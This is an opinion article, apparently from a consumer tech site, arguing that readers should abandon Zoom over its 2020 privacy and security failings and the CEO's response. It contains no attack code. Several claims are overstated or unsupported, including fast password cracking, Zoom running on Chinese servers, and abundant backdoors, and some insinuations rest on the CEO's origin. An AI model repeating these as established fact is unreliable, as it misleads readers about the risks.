Zoom’s serious security breaches affect working from home

Zoom

The Zoom CEO has responded to allegations, sorry proven truths, of Zoom’s serious security breaches affecting people working from home. But do we believe him, or is he just buying time?

Our U.S. correspondent and security analyst Sam Bocetta has analysed the situation. He believes Zoom’s serious security breaches are not only cause for concern – you should ditch it now.

And since he started researching this, the truth has come out first-hand – Zoom is not to be trusted.

Sam writes about Zoom’s serious security breaches (this is a U.S. perspective)

If any company’s stock has zoom, zoom, zoomed (literally) as a result of the ongoing pandemic, it is Zoom’s video conferencing app. Although share analysts say that this is temporary. Why?

  • The lockdown that made Zoom more popular cannot last.
  • Reputable companies like Microsoft will soon include the vastly superior Teams free (family and friends version) in consumer versions of Microsoft 365.
  • Zoom has to convert free users to paid users. Who would pay for an insecure app that is inferior to mainstream paid apps?
  • And its shares are grossly overvalued with ‘stags’ cashing out now as they know the price won’t last.
Zoom's serious security breaches

After all, this free app seemed the perfect solution for small business and enterprise operations alike. Software users increased from 10 million to 200 million – as millions of COVID-convicts went home to isolate, self-quarantine and work.

But the temporary share surge has quieted by revelations that the app not only exhibits serious privacy concerns, it also poses about as much difficulty to hackers as turning on a television.

Zoom CEO, Eric Yuan, has tried to get ahead of the public’s growing ill-will by apologising for the service’s shortcomings. He has laid out a strategy detailing how he plans to improve the situation. 

The trouble with Zoom’s serious security breaches

Zoom’s problems are two-fold since – both privacy and security. As if the general public wasn’t already suspicious enough of tech companies. Let’s take each in turn to get a sense of what we’re dealing with. 

Big Tech

Privacy, Schmivacy

Zoom use has soared to stratospheric levels. That is due to the high demand from managers looking for free tools to communicate with a new stay-at-home workforce. Many of those managers (small business especially) lack the ability to assess issues like security. And what is worse many can’t afford secure solutions, so they keep using it!

Reports quickly surfaced that the iOS version at least – without so much as a pardon me – was embedding Facebook’s software development kit and sending data to it and several other data aggregators. 

Zoom's serious security breaches

The bottom line is that lot of personal data went to Zuckerberg’s behemoth, trust-less social media platform Facebook. That has had its share of public mea culpas too. Data included the user’s phone model and carrier, time zone, location/city, and unique ad identifier. It may also have included academic records and information stored in the Zoom cloud. We just don’t know, and Zoom won’t admit anything.

It’s also worth mentioning that nobody asked the phone owner if this data collection was OK. I am pretty sure GDPR wouldn’t be OK with this. As Zoom is ‘closed-source’ no one can verify what it is doing. I don’t take anyone’s word at face value.

NOTE – Several class-action lawsuits against Zoom under the new California Consumer Privacy Act resulted from this.

U.S. counterintelligence officials worry about one video conference platform in particular: Zoom.

It didn’t take long for the FBI and global cybersecurity experts to sound the alarm. Subsequently, they as well as Google, NASA, SpaceX, the U.S., Canadian, German, Singapore, Taiwan, the U.K. and Australian Governments, and a long list of others have banned employees from using Zoom.

One trusted acquaintance relayed the following to me, and I quote: 

“I was on a teleconference call last week with a Chinese company using Zoom for the first time. Malwarebytes started screaming that Zoom had installed a PUP (potentially unwanted program). It was tracking my internet use even after I ended the teleconference. I took screenshots and raised the matter with the company.

It responded, ‘We have the right to load tracking software on any device that has contact with us.’ No apology or any apparent concern.

Fact is the Zoom Windows client is vulnerable to UNC path injection that allows attackers to steal the Windows credentials, track internet use or download poisoned apps or images. Passwords can be cracked in less than 16 seconds.

Zoom runs on Chinese servers – subject to the law of that country

Now might be a good time to point out that the free Zoom runs on Chinese servers. Does that make anyone excited to go out and bet their life on the company’s trustworthiness?

Zoom's serious security breaches

Did anyone even try to secure this thing?

Zoom is one of the millions of poorly or hastily written apps that try to cash in on trends. App security is perhaps the last thing that amateur programmers are worried about. Just ask Mark Zuckerberg who wrote Facebook in University PHP language. PHP is one of the fastest ‘quick and dirty’ programming languages and one of the easiest ‘scripting’ languages to hack. But it gets worse.

App writers (let’s not insult real programmers) use a grab bag of free, off the shelf SDK (software development kits) and APIs (Application Programming Interface). They cobble together an app that works. Security is an afterthought, as evidenced by Zoom.

And if the app is free, they monetise your data by adding Facebook or other data sharing links.

Not to mention that Chinese developers must use government sanctioned SDKs and APIs from Chinese Communist party-controlled Tencent, Baidu, Alibaba and more. Backdoors – hell even multiple front doors abound.

If you have a few extra hours all the recent Zoom security problems are here. For our purposes here, let’s just hit the highlights.

Zoombombing and more

 This one caught public attention due to the shock value and, of course, a catchy name. Zoombombing is when someone (not necessarily a hacker) breaks into a live chat and does what hackers typically do. They spread profanity, hate, and pornography wherever they can. But it also means that your ‘boss’ can covertly eavesdrop as well!

An early Zoombombing incident saw an attacker break into an online classroom and plaster Swastikas on students’ screens. This caught the FBI’s attention and resulted in a public warning about Zoom’s security shortcomings.

It wasn’t long before a list of other bugs came to light:

  • Hackers gaining control of a user’s microphone/webcam
  • Mac desktop users finding Zoom had root-level access to the system
  • Promised data encryption never occurred
  • While there are many security issues with streaming video and remote video conferencing in general, Zoombombing and data exfiltration are undoubtedly the most critical problems.

OK, I’ve been beating up on Zoom for a while now. Let’s give Mr Yuan a chance for rebuttal.

He writes in a Zoom blog post: 

“We recognise that we have fallen short of the community’s and our privacy and security expectations. For that, I am deeply sorry, and I want to share what we are doing about it.”

For users already burned by tech giants privacy invasions, it doesn’t take much to send them scurrying to find secure alternatives. For those who keep an open mind, Yuan says he has a plan of action to address the problems. 

However, Zoom at its roots is a Chinese company (It may be on the US NASDAQ since April 2019). Yuan (Yuán ZhÄ“ng) is a Chinese national from Tai’an, Shandong, and educated at Shandong University of Science and Technology. He:

  • moved to the U.S. mid-90s, after obtaining a visa on the ninth try.
  • leant his trade at WebEx which was bought by Cisco in 2007.
  • founded Zoom in 2011. You can read the Wiki here.

The software is developed by two Chinese companies, all known as Ruanshi Software and owned by Zoom. A third obscure Chinese company, known as American Cloud Video Software Technology, is involved – ownership is unclear.

90 Days to Maintain Trust

In any event, here’s the Zoom plan laid out by Yuan.

Yuan described a 90-day course of action that will lead to better processes to identify and correct the kind of troublesome issues recently encountered. He says it it will return Zoom to a state which allows the company to “maintain your trust.” 

Towards that end, you can expect:

  • An immediate freeze on feature development to focus on fixing security and privacy concerns.
  • Retain third-party experts to review all issues and make them transparent to the public.
  • Remove the Facebook SDK (although he also said it would be reconfigured not to collect data – umm, which is it? Remove or reconfigure?).
  • Increase the bug bounty program.
  • Hold a weekly webinar, hosted by Yuan, to update the Zoom community on progress.

So far, Zoom’s CEO has adequately been contrite, though it feels to me like the kid caught with his hand in the cookie jar. He’s begging forgiveness and returns the cookie. But you know he’ll be rooting in there again the moment you take your eye off it. 

It will take both talk and action to maintain loyalty from the vast number of small and large businesses struggling to maintain an employer/employee relationship in the new remote work world.

GadgetGuy’s take:

Dump Zoom or Face Doom. Zoom’s serious security breaches are inexcusable.

OK, you ask whether you care if you about hacking or nation-state spying? Are you at risk? Yes, you are.

It is not just that an app or nation-state could steal Aunty Mame’s secret crochet stitch. It is what metadata and speech-to-text conversion of your conversation could reveal. This is dangerous as certain keywords can make you a target.

At best, it is just your physical address (from IP) and that you like pilates and chocolates. But if that was ever added to Facebook or your dark web profile (not sure which is worse), you could be ad-bombed or a target for subversion (yes, put on your tin-hat for that).

At worst, you could be discussing trade secrets, business plans, going over budgets (shared on the screen) or discussing your financial situation with an accountant. What if a hacker sold that information to a competitor (and they are – corporate espionage is a big thing).

But Zoom is free – does it matter?

For every leak fixed, three more seem to emerge. The long list of security vulnerabilities was always going to catch up with Zoom. However, whether Yuan can talk his way out of the apparent links to China – a potential death sentence in the U.S. – remains to be seen.

At this point, if you’re one of the millions of people still using Zoom, you have two options.

One, keep using the app. If you do this, you must trust Yuan and friends that the laughably long list of larceny is nothing but an awful series of mistakes incurred by software that was not ready for the major league. And you must believe it as free software it will be fixed. Is that a pig flying past my window or a fat Easter Bunny?

Two, and this seems the obvious choice to me; find another app that does the same thing but does not steal data and create a fast lane for hackers and nation-states to cause mischief.

It all depends on your level of belief in Yuan’s sincerity.

We say ditch Zoom! Otherwise, you’re potentially opening your conversations up to hackers, or worse. The risk is that Zoom is just another garden variety, data-scraping tool masquerading as a useful service.

Choose now.